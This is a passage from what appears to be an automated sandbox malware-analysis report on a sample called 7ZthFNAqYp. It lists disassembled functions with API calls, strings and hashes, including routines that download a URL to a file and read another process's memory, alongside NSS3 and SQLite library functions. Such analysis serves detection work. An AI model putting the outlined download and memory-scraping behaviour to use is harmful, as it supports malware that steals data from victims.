                                                                                                                                                                                                              • Instruction ID: b2a40f3efa5e4bccf87a1a9264b6504b68429d96df3f1a6ed4eb2167db4acb85
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcfbf9040530a7f09a711ea8c17f0e2259a23e3df23c09d6e8e0700c9f4818b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B73123B290A3D69BEB108F549840B6BB7A8EF42348F150139EC1C97F01E7B1D904C7D2
                                                                                                                                                                                                              Function 009267ED Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00926836
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 00926856
                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00926877
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00926892
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 009268C8
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 009268F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00926923
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0092692A
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00926936
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2507841554-0
                                                                                                                                                                                                              • Opcode ID: 46e786a96e1d4f47c3247cb9208b9cd64a9bd0a83e3238747515bbb6d4ec33d4
                                                                                                                                                                                                              • Instruction ID: 42516a5ae333fc2828079fc9e04ed514d7e4be4de2f80fd0063f4caf0a4eef8b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46e786a96e1d4f47c3247cb9208b9cd64a9bd0a83e3238747515bbb6d4ec33d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01412CB5901128ABDB209B20ED45BDA7BBCEF48300F1005A5BB19A7166DA309EC5CF94
                                                                                                                                                                                                              Function 0094679D Relevance: 13.6, APIs: 9, Instructions: 64COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 009467C4
                                                                                                                                                                                                              • _free.LIBCMT ref: 009467D2
                                                                                                                                                                                                              • _free.LIBCMT ref: 009467DD
                                                                                                                                                                                                              • _free.LIBCMT ref: 009467B1
                                                                                                                                                                                                                • Part of subcall function 0093DACB: HeapFree.KERNEL32(00000000,00000000,?,0093D321,00000000,0095B79C,0093D368,0092EE93,?,?,0093D452,0095B79C,?,?,0094EDC8,0095B79C), ref: 0093DAE1
                                                                                                                                                                                                                • Part of subcall function 0093DACB: GetLastError.KERNEL32(?,?,?,0093D452,0095B79C,?,?,0094EDC8,0095B79C,?,?,?), ref: 0093DAF3
                                                                                                                                                                                                              • ___free_lc_time.LIBCMT ref: 009467FB
                                                                                                                                                                                                              • _free.LIBCMT ref: 00946806
                                                                                                                                                                                                              • _free.LIBCMT ref: 0094682B
                                                                                                                                                                                                              • _free.LIBCMT ref: 00946842
                                                                                                                                                                                                              • _free.LIBCMT ref: 00946851
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3704779436-0
                                                                                                                                                                                                              • Opcode ID: 059af26c4450fde36301817a33277e07d03a58180d1a4a242954a6c520e1c190
                                                                                                                                                                                                              • Instruction ID: 54af4d8ec7a557df624ce6b8bf756cd26085ce8f098bb66aa4144f9dc10b9790
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 059af26c4450fde36301817a33277e07d03a58180d1a4a242954a6c520e1c190
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC118FB25053019BDB31AF64E985F5A73EDEB42324F18483EE144D7202DB32DC84CB12
                                                                                                                                                                                                              Function 6CB24DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CB2536F,00000022,?,?,00000000,?), ref: 6CB24E70
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CB24F28
                                                                                                                                                                                                              • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CB24F8E
                                                                                                                                                                                                              • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CB24FAE
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB24FC8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                              • String ID: %s=%c%s%c$%s=%s
                                                                                                                                                                                                              • API String ID: 2709355791-2032576422
                                                                                                                                                                                                              • Opcode ID: 6630e9ef5b0053bb66ce6f6d73a57250ecf7783a2730a14e8d6e98c421cd4c9e
                                                                                                                                                                                                              • Instruction ID: a00c3495d57cd6889e336fdad2281c18e10383adb5942f136c172c7343dc3eea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6630e9ef5b0053bb66ce6f6d73a57250ecf7783a2730a14e8d6e98c421cd4c9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D512A31A051D58BFF15DA6984907FF7BF5EF46308F288125E89CA7E40D32D88458F92
                                                                                                                                                                                                              Function 6CA67D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA67E27
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA67E67
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CA67EED
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA67F2E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 912837312-598938438
                                                                                                                                                                                                              • Opcode ID: 819c3bcda8b7cc3ea91d0f1dfc5ad6a5d8646bd7eecdecec549d63e4954ea076
                                                                                                                                                                                                              • Instruction ID: 602ee3f5343566f2b71d35d1f95fd02b8e6cfe3b61442bd3da077a78f74d2322
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 819c3bcda8b7cc3ea91d0f1dfc5ad6a5d8646bd7eecdecec549d63e4954ea076
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A61C174A102459FDB05CF26C890FAA77B2BF45318F1845A8EC198BB52D731EC99CBA0
                                                                                                                                                                                                              Function 6CA4FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA4FD7A
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4FD94
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA4FE3C
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4FE83
                                                                                                                                                                                                                • Part of subcall function 6CA4FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CA4FEFA
                                                                                                                                                                                                                • Part of subcall function 6CA4FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CA4FF3B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 1169254434-598938438
                                                                                                                                                                                                              • Opcode ID: 1484be913d04158c243e5c4d05c764d26c188ced953b462c89df4ac54e7b56d0
                                                                                                                                                                                                              • Instruction ID: 1ef11d1fd54aaecb6da2cd212f95a78d8087cc9cd67b0ffa85e79bc3be0de76f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1484be913d04158c243e5c4d05c764d26c188ced953b462c89df4ac54e7b56d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F517275A002059FDB04CFA9CD91AAEB7B1FF48318F14906DDA05AB752E731EC95CB90
                                                                                                                                                                                                              Function 0092F8EA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0092FBB8,?,00000000,00000000,?,?), ref: 0092F909
                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0092FBB8,?,00000000,00000000), ref: 0092F933
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0092F980
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0092F9D9
                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0092FA31
                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0092FBB8,?,00000000,00000000,?,?), ref: 0092FA42
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MemoryProcessQueryReadVirtual
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 3835927879-2766056989
                                                                                                                                                                                                              • Opcode ID: 1d5a6aea9062e194c5a549ced71c5a509672ac662438e3da5914450692042a7e
                                                                                                                                                                                                              • Instruction ID: 30fbb0a1c4619765111e3982f8c56c888689d7568e59015df5046d930721d102
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d5a6aea9062e194c5a549ced71c5a509672ac662438e3da5914450692042a7e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE41AC32A00219BFDF109FA1EC55BDE7B7AFF84760F148039FA05A6194E7748A51DB90
                                                                                                                                                                                                              Function 6CAD8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000,00000000,?,6CAE124D,00000001), ref: 6CAD8D19
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CAE124D,00000001), ref: 6CAD8D32
                                                                                                                                                                                                              • PL_ArenaRelease.NSS3(?,?,?,?,?,6CAE124D,00000001), ref: 6CAD8D73
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CAE124D,00000001), ref: 6CAD8D8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CAE124D,00000001), ref: 6CAD8DBA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                              • String ID: KRAM$KRAM
                                                                                                                                                                                                              • API String ID: 2419422920-169145855
                                                                                                                                                                                                              • Opcode ID: 386ea9c038471047e6f16b4a2deee764b456f7eda4b753532b7435a527ba05a4
                                                                                                                                                                                                              • Instruction ID: 49bbd78ab99b07b8bb6832de77f3b7b5342f169cf3e455521e9d2a4cc3a122a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 386ea9c038471047e6f16b4a2deee764b456f7eda4b753532b7435a527ba05a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8218BB5A046018FCB00EF39C58469EBBF0FF45308F1A896AD89887741EB34E885CBD1
                                                                                                                                                                                                              Function 6CBD0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CBD0EE6
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CBD0EFA
                                                                                                                                                                                                                • Part of subcall function 6CABAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CABAF0E
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F16
                                                                                                                                                                                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F1C
                                                                                                                                                                                                              • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F25
                                                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F2B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                              • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                              • API String ID: 2948422844-1374795319
                                                                                                                                                                                                              • Opcode ID: 54b293a51f429bc79fcc7f39533fc4ab13b0df14dde760030a2a29dfdebd0a49
                                                                                                                                                                                                              • Instruction ID: f48e4081ab51539f4bbe5de3ae47ce634db65c8cebe6ae8660a6b2dab1c4719e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54b293a51f429bc79fcc7f39533fc4ab13b0df14dde760030a2a29dfdebd0a49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9601C0B5A00154BBDF01AF64EC4689F3F3DEF467A8F114064FD0997B01E635E9508BA2
                                                                                                                                                                                                              Function 6CB94D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB94DC3
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB94DE0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • misuse, xrefs: 6CB94DD5
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB94DCB
                                                                                                                                                                                                              • invalid, xrefs: 6CB94DB8
                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 6CB94DBD
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CB94DDA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                              • API String ID: 632333372-2974027950
                                                                                                                                                                                                              • Opcode ID: 222e59e4950f96960a84d2ae472f1908649091951f852e2c26d968c5bc1391e1
                                                                                                                                                                                                              • Instruction ID: 620c94c45a4907246135408c84ae3477699178281bc719bd6144ccea865228c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 222e59e4950f96960a84d2ae472f1908649091951f852e2c26d968c5bc1391e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEF0242DA155F82BDA104024CD20F8637959F03329F1609B1EE246BF72E2069C588692
                                                                                                                                                                                                              Function 6CB94DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
